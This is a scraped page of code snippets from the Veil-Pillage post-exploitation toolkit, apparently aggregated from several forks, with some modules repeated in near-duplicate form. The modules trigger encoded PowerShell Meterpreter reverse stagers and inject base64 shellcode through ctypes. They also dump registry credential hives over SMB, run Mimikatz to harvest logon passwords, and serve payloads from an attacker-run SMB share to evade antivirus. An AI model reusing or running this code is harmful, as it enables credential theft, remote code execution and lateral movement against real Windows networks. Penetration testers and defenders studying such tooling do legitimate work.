$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(lhost, lport)

        # get the encoded powershell trigger command
        if stager.lower() == "rev_tcp":
            triggerCMD = helpers.encPowershell(revTCPStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_tcp"
        elif stager.lower() == "rev_http":
            triggerCMD = helpers.encPowershell(revHTTPStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_http"
        elif stager.lower() == "rev_https":
            triggerCMD = helpers.encPowershell(revHTTPSStager)
            handler += "\nset PAYLOAD windows/meterpreter/reverse_https"
        else:
            print helpers.color("\n [!] Stager not recognized: please enter rev_tcp, rev_http, or rev_https\n", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""

        # finish off the handler and write it to the tmp directory
        handler += "\nset LHOST " + lhost
        handler += "\nset LPORT " + lport
        handler += "\nset ExitOnSession false"
        handler += "\nexploit -j\n"
        f = open('/tmp/handler.rc', 'w')
        f.write(handler)
        f.close()

        # build and spawn a handler for the invoked payload
        if spawnHandler.lower() == "true":
            handlerPath = "/tmp/handler.rc"
            # command to spawn a new tab
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

        # execute the powershell trigger command on each target
        for target in self.targets:

            # trigger the command and set output as appropriate
            print "\n [*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target
            self.output += "[*] Triggering powershell stager '"+stager.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n"
            command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
コード例 #24
0
ファイル: hashdump.py プロジェクト: 5l1v3r1/Veil-Pillage-1
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # let's keep track of ALL hashes found
        allHashes = ""

        # reg.exe command to save off the hives
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

        for target in self.targets:

            print helpers.color("\n [*] Dumping hashes on " + target)

            # execute the registry save command
            command_methods.executeCommand(target, username, password,
                                           regSaveCommand, triggerMethod)

            # sleep for 5 seconds to let everything backup
            time.sleep(5)

            # grab all of the backed up files
            systemFile = smb.getFile(target,
                                     username,
                                     password,
                                     "C:\\Windows\\Temp\\system",
                                     delete=False)
            securityFile = smb.getFile(target,
                                       username,
                                       password,
                                       "C:\\Windows\\Temp\\security",
                                       delete=False)
            samFile = smb.getFile(target,
                                  username,
                                  password,
                                  "C:\\Windows\\Temp\\sam",
                                  delete=False)

            error = False
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                f = open('/tmp/system', 'w')
                f.write(systemFile)
                f.close()

            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/security', 'w')
                f.write(securityFile)
                f.close()

            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                f = open('/tmp/sam', 'w')
                f.write(samFile)
                f.close()

            if not error:
                # get all the hashes from these hives
                hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # add the hashes to our global list
                allHashes += hashes

                # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
                saveLocation = helpers.saveModuleFile(self, target,
                                                      "hashes.txt", hashes)

                self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

            else:
                self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"

        if allHashes != "":
            # get all non-empty hashes, uniquify and sort them
            allHashes = [p.lower() for p in allHashes.split("\n") if p != '']
            allHashes = sorted(set(allHashes))
            self.output += "[*] All unique hashes:\n" + "\n".join(
                allHashes) + "\n"
コード例 #25
0
ファイル: autograb.py プロジェクト: johnjohnsp1/Veil-Pillage
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = 'powershell.exe -c "$a=42;$a"'
                powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42":
                    powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(
                    target,
                    username,
                    password,
                    secondStagePath,
                    lhost,
                    "",
                    triggerMethod="winexe",
                    outFile=out_file,
                    ssl=use_ssl,
                    noArch=True,
                )

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += (
                        "[*] Autograb.ps1 results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Autograb.ps1 failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
                print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
                securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
                samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/system", "w")
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/security", "w")
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open("/tmp/sam", "w")
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " saved to "
                    + saveLocation
                    + "\n"
                )

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult:
                    arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(
                    target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
                )

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target, username, password, out_file, delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)

                if out != "":
                    self.output += (
                        "[*] Mimikatz results using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " stored at "
                        + saveFile
                        + "\n"
                    )
                else:
                    self.output += (
                        "[!] Mimikatz failed using creds '"
                        + username
                        + ":"
                        + password
                        + "' on "
                        + target
                        + " : no result file\n"
                    )

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
        if len(alltspkg) > 0:
            alltspkg = sorted(set(alltspkg))
            self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
コード例 #26
0
def hostTrigger(targets,
                username,
                password,
                exePath,
                localHost,
                triggerMethod="wmis",
                exeArgs=""):
    """
    Spins up an Impacket SMB server and hosts the binary specified by exePath.
    The specified triggerMethod (default wmis) is then used to invoke a command
    with the UNC path "\\localHost\\exe" which will invoke the specified
    executable purely in memory.

    Note: this evades several AV vendors, even with normally disk-detectable
    executables #avlol :)

    This takes 'targets' instead of a single 'target' since we don't want to set up
    and tear down the local SMB server every time.
    """

    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the hosted .exe file name
    hostedFileName = helpers.randomString() + ".exe"

    # make the tmp hosting directory if it doesn't already exist
    if not os.path.exists(settings.TEMP_DIR + "shared/"):
        os.makedirs(settings.TEMP_DIR + "shared/")

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/shared/" +
              hostedFileName)

    # spin up the SMB server
    server = smb.ThreadedSMBServer()
    server.start()
    time.sleep(.5)

    # build the UNC path back to our host and executable and any specified arguments
    cmd = "\\\\" + localHost + "\\system\\" + hostedFileName + " " + exeArgs

    for target in targets:
        # execute the UNC command for each target
        command_methods.executeCommand(target, username, password, cmd,
                                       triggerMethod)

    print helpers.color("\n [*] Giving time for commands to trigger...")
    # sleep so the wmis/winexe commands can trigger and the target
    # can grab the .exe from the SMB server
    time.sleep(10)

    # shut the smb server down
    server.shutdown()

    # remove the temporarily hosted files
    os.system("rm -rf " + settings.TEMP_DIR + "/shared/")

    # not sure if need to do this to kill off the smb server...
    # os.kill(os.getpid(), signal.SIGINT) ?

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return hostedFileName
コード例 #27
0
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '" +
                                    handlerPath + "' not valid!")
        else:
            pass

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
            b64sc)
        # path to the minial python isntall
        pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$",
                                           "\\Windows\\Temp\\",
                                           [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " +
                                    target)
                command_methods.executeCommand(target, username, password,
                                               unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                print helpers.color(" [*] Triggering 'python -c' command on " +
                                    target)
                command_methods.executeCommand(target, username, password,
                                               pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"

            else:
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
                print helpers.color(
                    "[!] 7za.exe and python.zip unsuccessfully uploaded to " +
                    target + "\n",
                    warning=True)
コード例 #28
0
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))


        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
        else: pass


        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
        # path to the minial python isntall
        pythonPath =  settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"


        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " + target)
                command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                print helpers.color(" [*] Triggering 'python -c' command on " + target)
                command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"

            else:
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
                print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
コード例 #29
0
ファイル: hashdump.py プロジェクト: johnjohnsp1/Veil-Pillage
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # let's keep track of ALL hashes found
        allHashes = ""

        # reg.exe command to save off the hives
        regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

        for target in self.targets:

            print helpers.color("\n [*] Dumping hashes on " + target)

            # execute the registry save command
            command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)

            # sleep for 5 seconds to let everything backup
            time.sleep(5)

            # grab all of the backed up files
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)

            error = False
            if systemFile == "":
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                f = open("/tmp/system", "w")
                f.write(systemFile)
                f.close()

            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open("/tmp/security", "w")
                f.write(securityFile)
                f.close()

            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                error = True
            else:
                f = open("/tmp/sam", "w")
                f.write(samFile)
                f.close()

            if not error:
                # get all the hashes from these hives
                hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # add the hashes to our global list
                allHashes += hashes

                # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
                saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)

                self.output += (
                    "[*] dumped hashes (reg.exe) using creds '"
                    + username
                    + ":"
                    + password
                    + "' on "
                    + target
                    + " saved to "
                    + saveLocation
                    + "\n"
                )

            else:
                self.output += (
                    "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
                )

        if allHashes != "":
            # get all non-empty hashes, uniquify and sort them
            allHashes = [p.lower() for p in allHashes.split("\n") if p != ""]
            allHashes = sorted(set(allHashes))
            self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
コード例 #30
0
ファイル: autograb.py プロジェクト: 5l1v3r1/Veil-Pillage-1
    def run(self):

        # assume single set of credentials for this module
        username, password = self.creds[0]

        lhost = self.required_options["lhost"][0]
        use_ssl = self.required_options["use_ssl"][0]
        force_method = self.required_options["force_method"][0]
        delay = self.required_options["delay"][0]
        out_file = self.required_options["out_file"][0]

        # let's keep track of all credentials found
        allhashes, allmsv, allkerberos, allwdigest, alltspkg  = [], [], [], [], []

        for target in self.targets:

            powershellInstalled = False

            # check if we're forcing a particular grab method
            if force_method.lower() == "binary":
                powershellInstalled = False
            elif force_method.lower() == "powershell":
                powershellInstalled = True
            else:
                # check if we have a functional Powershell installation
                powershellCommand = "powershell.exe -c \"$a=42;$a\""
                powershellResult = command_methods.executeResult(
                    target, username, password, powershellCommand, "wmis")
                if powershellResult.strip() == "42": powershellInstalled = True

            if powershellInstalled:

                # do powersploit combined file of invoke-mimikatz and powerdump
                print helpers.color("\n [*] Powershell installed on " + target)
                self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                # path to the combined Invoke-Mimikatz/powerdump powershell script
                secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"

                # trigger the powershell download on just this target
                delivery_methods.powershellHostTrigger(target,
                                                       username,
                                                       password,
                                                       secondStagePath,
                                                       lhost,
                                                       "",
                                                       triggerMethod="winexe",
                                                       outFile=out_file,
                                                       ssl=use_ssl,
                                                       noArch=True)

                print "\n [*] Waiting " + delay + "s for Autograb to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
                                                  out)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # parse the powerdump component
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                if out != "":
                    self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

            else:
                # do reg.exe for hashdump and host/execute for mimikatz
                print helpers.color("\n [!] Powershell not installed on " +
                                    target,
                                    warning=True)
                print helpers.color(
                    "\n [*] Using reg.exe save method for hash dumping on " +
                    target)
                self.output += "[!] Powershell not installed on " + target + "\n"

                # reg.exe command to save off the hives
                regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"

                # execute the registry save command
                command_methods.executeCommand(target, username, password,
                                               regSaveCommand, "wmis")

                print helpers.color("\n [*] Dumping hashes on " + target)

                # sleep for 5 seconds to let everything backup
                time.sleep(5)

                # grab all of the backed up files
                systemFile = smb.getFile(target,
                                         username,
                                         password,
                                         "C:\\Windows\\Temp\\system",
                                         delete=False)
                securityFile = smb.getFile(target,
                                           username,
                                           password,
                                           "C:\\Windows\\Temp\\security",
                                           delete=False)
                samFile = smb.getFile(target,
                                      username,
                                      password,
                                      "C:\\Windows\\Temp\\sam",
                                      delete=False)

                # more error-checking here?
                if systemFile == "":
                    self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/system', 'w')
                    f.write(systemFile)
                    f.close()

                if securityFile == "":
                    self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/security', 'w')
                    f.write(securityFile)
                    f.close()

                if samFile == "":
                    self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
                else:
                    f = open('/tmp/sam', 'w')
                    f.write(samFile)
                    f.close()

                # get all the hashes from these hives
                out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")

                # save the output file off
                saveLocation = helpers.saveModuleFile(self, target,
                                                      "creddump.txt", out)
                self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"

                # save these off to the universal list
                hashes = helpers.parseHashdump(out)
                allhashes.extend(hashes)

                # now, detect the architecture
                archCommand = "echo %PROCESSOR_ARCHITECTURE%"
                archResult = command_methods.executeResult(
                    target, username, password, archCommand, "wmis")
                arch = "x86"
                if "64" in archResult: arch = "x64"

                # now time for ze mimikatz!
                mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"

                # the temporary output file we will write to
                if "\\" not in out_file:
                    # otherwise assume it's an absolute path
                    out_file = "C:\\Windows\\Temp\\" + out_file

                exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

                # host mimikatz.exe and trigger it ONLY on this particular machine
                # so we can get the architecture correct
                delivery_methods.hostTrigger(target,
                                             username,
                                             password,
                                             mimikatzPath,
                                             lhost,
                                             triggerMethod="wmis",
                                             exeArgs=exeArgs)

                print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
                time.sleep(int(delay))

                # grab the output file and delete it
                out = smb.getFile(target,
                                  username,
                                  password,
                                  out_file,
                                  delete=True)

                # parse the mimikatz output and append it to our globals
                (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)

                allmsv.extend(msv1_0)
                allkerberos.extend(kerberos)
                allwdigest.extend(wdigest)
                alltspkg.extend(tspkg)

                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
                                                  out)

                if out != "":
                    self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
                else:
                    self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

        if len(allhashes) > 0:
            allhashes = sorted(set(allhashes))
            self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
                allhashes) + "\n"
        if len(allmsv) > 0:
            allmsv = sorted(set(allmsv))
            self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
        if len(allkerberos) > 0:
            allkerberos = sorted(set(allkerberos))
            self.output += "[*] All kerberos:\n\t" + "\n\t".join(
                allkerberos) + "\n"
        if len(allwdigest) > 0:
            allwdigest = sorted(set(allwdigest))
            self.output += "[*] All wdigest:\n\t" + "\n\t".join(
                allwdigest) + "\n"
